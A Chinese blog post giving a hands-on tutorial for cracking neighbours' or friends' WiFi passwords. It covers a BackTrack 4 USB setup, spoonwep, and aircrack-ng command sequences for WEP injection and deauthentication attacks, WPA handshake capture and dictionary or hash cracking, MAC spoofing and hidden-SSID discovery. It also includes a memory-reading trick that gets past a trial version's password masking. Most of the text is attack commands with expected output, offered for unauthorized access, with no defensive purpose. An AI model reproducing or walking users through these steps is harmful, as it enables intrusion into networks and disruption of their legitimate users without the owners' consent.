郑永博客

前两天到朋友那破解了wifi密码，现在讲一下如何破解wifi密码
在破解之前，有几点先说明一下：

一：如果你的光驱是dvd的话，我建议你使用DVD把下载回来的bt4映像文件和spoonwep2之deb包刻录在一起就OK了，如何刻录一起？就是在bt4.iso文件里加上spoonwep2文件（到后面有用到），（如果是笔记本电脑我也建议你用此方法），如果你用此方法，那么下载完bt4的映像文件和spoonwep2后跳过下面的bt4U盘版制作方法。
二：如果你的电脑是windows xp 的话，无线网卡是USB的话，建议你使用vm虚拟主机（这里就不介绍这个方法，但是提醒你，笔记本禁用此方法，因为虚拟主机无法读出内置的无线网卡）。
三：如果你有可启动的U盘的话（U盘要可以引导的，因为作者试过，有些U盘就算做了，但是笔记本也无法引导），那么请继续阅读以下资料，教你如何做U盘版BT4，请先准备好以下软件：
1、bt4-pre-final.iso (系统镜像) 下载地址：点击这里进入下载
2、grub4dos （软件）下载地址：点这里进入下载
3、dos的引导文件（3个，command、io.sys、msdos.sys ）点这里进入下载
4、HPUSBFW （惠普的格式化工具）点这里进入下载
5、spoonwep2之deb安装包，我下的是spoonwep-wpa-rc3.deb 点这里进入下载

四、制作步骤：
1、用HPUSBFW软件,以格式化的方式将DOS引导文件写入U盘；
2、将grub4dos解压出来，把里面的 grldr ， Grub.exe ， menu.lst 这3个文件复制进U盘根目录；
3、 把 BT4.iso 里的 boot ，casper 这2个文件夹复制到U盘根目录；
4、用 boot\grub 目录下的 menu.lst 替换掉U盘根目录下的 menu.lst 这个文件;
5、接着把spoonwep的deb安装包复制到U盘根目录下
注： DOS引导文件是默认隐藏的，所以DOS文件夹中是空白很正常。

五、测试：
1、开机，进入BIOS，设置为U盘优先启动，然后保存并重启；
2、开始时会闪过win 98 的启动界面，然后进入到DOS；
3、输入命令“grub” ，然后按回车键，进入到grub引导模式；
4、根据提示和个人需求选择自己想要的模式，一般选择第一种模式即可（1024*768）；
5、系统加载完毕后，直接输入startx登录；
6、这样你就成功启动BT4了；
7、接下来就是在bt4下安装spoonwep了，进入bt4后，首先点击左下角的开始菜单，点击一个叫system mune的弹出菜单，再点击“storeage media”，会打开一个窗口，点击窗口上面有个刷新的按钮，在窗口下面空白的地方会列出你的硬盘和外设，进入U盘，找到刚才放入的spoonwep-wpa-rc3.deb，把这个文件复制到BT4的桌面（其实就是/root），可以直接拖到桌面，打开命令行窗口
运行“dpkg -i spoonwep-wpa-rc3.deb” ，桌面会建立一个图标，即是spoonwep；
8、下面要做的是破解wep密码，开始spoonwep的使用了：打开一个shell，输入ifconfig -a回车，然后再输入airmon-ng start wlan0 6回车，接着输入
ln -fs bash /bin/sh回车，再输ls -al /bin/sh回车（这个命令可以显示是否设置成功，显示bash为成功,dash为失败）返回的结果为bash
则继续，输入spoonwep回车后就会弹出spoonwpa的窗口啦；
9、在NET CARD里选mon0，在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索，就可以看见好多网卡啦，选定1个必须有客户端的网卡点击SELECTION OK, 再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE，然后就等密码啦！！
10、以上是破解wep密码，如果你想破解wpa2的密码，需要EWSA、WinHex、bt4、希希密码四款工具
下载Elcomsoft Wireless Security Auditor安装好，写这篇文章时，最新版是1.04，下载地址：http://www.elcomsoft.com/ewsa.html
下载WinHex多国语言版安装好，最新版是V15.4 SR-11 ；下载地址：http://www.orsoon.com/soft/4921.html
bt4你下载过了吧？
下载希希密码，最新版是v1.0 下载地址：http://aswordok.blog.163.com/blog/static/3216366420097188433961/
开始wpa破解
1.进入bt4，抓取目标路由器的WPA2握手包，保存拷贝到其它盘中备用；命令如下：
开第一个窗：
ifconfig -a
ifconfig -a wlan0 up
airmon-ng start wlan0 6
注意这步BT3中通常回显monitor mode enabled,后面的命令端口用wlan0
而BT4中是monitor mode enabled on mon0,后面的命令端口用mon0
airodump-ng -w pack -c 6 wlan0/mon0(bt3用wlan0,bt4用mon0,下同) 保存名为：pack
开第二个窗：
aireplay-ng -0 10 -a (ap mac) wlan0/mon0
反复运行，当第一个窗右上角出现WPA handshake: xx:xx:xx:xx:xx:xx字样时，抓包完毕
只有有合法客户端存在时，才能抓到握手包，合法客户端在第一个窗口下面有显示。
2.运行希希密码，生成一个密码字典备用，或另找其它的字典也可以；
3.启动EWSA,设置好"Option->CPU Options"和"Option->GPU Options"确保你的显卡在支持之列，否则效率会大大大地打折扣，"Option->Dictionary Options"中加入准备好的密码字典文件，"File->Import TCPDUMP File"导入握手包文件，点击工具栏中的"Restart attack",剩下的就是等待密码出来，会显示在Password栏中，由于是"trial version"版，只显示了前两位；
4.启动WinHex,选择"Help->Setup->Chinese,please!"切换为中文，选择"工具->打开RAM",选择列表中的"Ewsa#nnnn->全部内存"打开,搜索前面显示的密码的前两位，一路按F3查找，看到前后都是空白，中间一串字符就是密码了，很好区分。
其实抓到包以后可以用另一种更容易的方法，把CAP数据包拷贝出来在WIN下用WinAircrack 破解
启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...
<Key Found! [xxxxxxxx]>

如果想深入一点了解的话，继续阅读下面摘自网络的资料，个人感觉解释的比较清楚：

[] 可选
<> 回显
/ 或者
() 提示

---------------------WEP---------------------
shell 1:----------------------------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
[
macchanger -m 00:11:22:33:44:55 wlan0
<修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>
]
2.ifconfig -a wlan0 up
(5100可能要加载网卡才支持注入?)
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是频道)
另一说5100要支持注入用airmon-ng start wlan0
如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
<Injection is working/No anwser>(注入攻击成功/不成功)
(检测你的网卡是否支持注入)
]
4.airodump-ng -w pack -c 6 mon0/wlan0
(pack是随便起的获取的ivs的保存文件的名字)
另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0

shell 2:----------------------------------------
一、有客户端：
破解:abcd四种方式
a.合法客户端产生大量有效的数据，能直接获得大量cap。
收到10000以上data后，直接转shell 3,破解密码
b.合法客户端只能产生少量数据，就需要注入<-3>攻击加速产生大量数据。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)
<Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多类似行>
c.合法客户端不在通信，注入模式不成功，
用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，
新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0
6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0
(可能要另开窗)
d.有客户端，并且客户端能产生有效arp 数据的另类破解方式
输入modprobe –r iwl3945
(加载网卡)
输入modprobe ipwraw
输入airmon-ng start wlan0 6
现在，只要一个命令就搞定，输入:
输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。
<key: 12:34:56:78:90>

二、无客户端：
5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
(我成功了)
另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0
<Authentication successful>
<Association successful>
(建立虚拟伪装连接)
如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)
破解:abcd四种方式
a.-2 crack mode ---------------
建立虚拟连接后直接用-2交互攻击模式集合了抓包，提数据和发包攻击
6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
发包成功后可得到足够的ivs，然后用aircrack-ng破解
b.-3 crack mode ---------------
6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0
7.用aircrack-ng破解<自己添加的步骤?>
c.-4 crack mode ---------------
-4攻击模式；制造数据包；-2交互式攻击模式
6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0
<?yes>
<Saving keystream in replay_dec-0523-075615.xor>
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp
(提取上面xor 文件来伪造一个arp包)
8.aireplay-ng -2 -r myarp mon0
一说用aireplay-ng -2 -r myarp -x 512 mon0
(发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨)
9.用aircrack-ng破解
d.-5 crack mode ---------------
-5碎片攻击模式；制造数据包；-2交互式攻击模式
(我成功过)
6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0
<?yes>
<Saving keystream in fragment-1216-201426.xor>
(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）)
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
(Myarp随便起的文件名)
<Wrote packet to: myarp>
8.aireplay-ng -2 -r myarp -x 256/512 mon0
<?yes>
(这时，前面的抓包窗口上的data 将迅速增加)
(512是攻击速度，1024是最大值)
9.采用aircrack-ng 来进行破解

shell 3:----------------------------------------
aircrack-ng *.cap
如果shell 1用了--ivs 参数，则这里用aircrack-ng *.ivs
(我成功了)
另一说用aircrack-ng -n 64 -b APmac pack-01.cap
<KEY FOUND! [......] <ASCII:XXXXX>>

附:
5100用BT4+spoonwep2破解
1.把spoonwep2放在BT4\modules\下,启动BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<显示bash为成功,dash为失败>
3.开spoonwep2，里面可以找到网卡了,选wlan0进入搜索，但这时不会搜出来什么，
关闭一下spoonwep2再重启spoonwep2，
这时网卡项里有一个mon0的，选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack，点击launch后就等待密

码的出来(sata数据包到30000个左右)。
(注：论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)

---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是频道)
4.airodump-ng -w 12345 -c 6 mon0/wlan0
(保存名为12345.cap)
(-w：写入文件，-c：截取cap的频道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)
<18:56:20 Sending 64 directed DeAuth,... 一些类似行>
(-c后面为合法无线客户端的MAC地址)
(迫使AP重新与已连接的合法客户端重新握手验证)
(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万，
因为它只要一个包含WPA握手验证包就可以了)
Cap数据包破解:
a.暴力破解
6.aircrack-ng -x -f 2 12345*.cap
另一说是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典破解
6.aircrack-ng -w password.txt 12345*.cap
另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
(
-w：是字典破解模式
Password.txt是你事先准备好的字典。
技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root 下（aircrack 默认
的工作目录在/root）。
请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。
)
c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解
启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...
<Key Found! [xxxxxxxx]>
d.HASH破解
6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)
(Windows版本操作步骤与其Linux下版本完全一致)
(
参数解释：
-f 这里跟上采用的字典
-d 生成的Table文件名称
-s 目标AP的ESSID
)
7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK
(
参数解释：
-d 导入WPA PMK Hash Table文件名称，下图中为dlink-birth.hash
-r 事先捕获的WPA握手数据包
-s 目标AP的ESSID
)

---------------------end---------------------

WPA破解，怎么知道有握手包被截获？
airodump-ng监视窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65

BT4抓包后，cap文件保存在哪？
输入ls可以看到啊,默认在root下。

如何获得合法端mac？
windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截，Linux可用

Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是，若目标网络采用WEP或者WPA加密的话，有时需先行破解再对数据

包解密方可看到客户端MAC。
前面第一个shell，如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac
BSSID STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb

如何查找隐藏的SSID？
1.在BT4下先打开一个shell,输入
airodump-ng 网卡端口
2.打开另一个shell,输入
aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口
可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止
3.然后就可以在上个shell,看到显示出来的SSID。

除非注明，郑永博客文章均为原创，转载请以链接形式标明本文地址

本文地址：http://www.xptt.com/crack-wifi-password-technology.html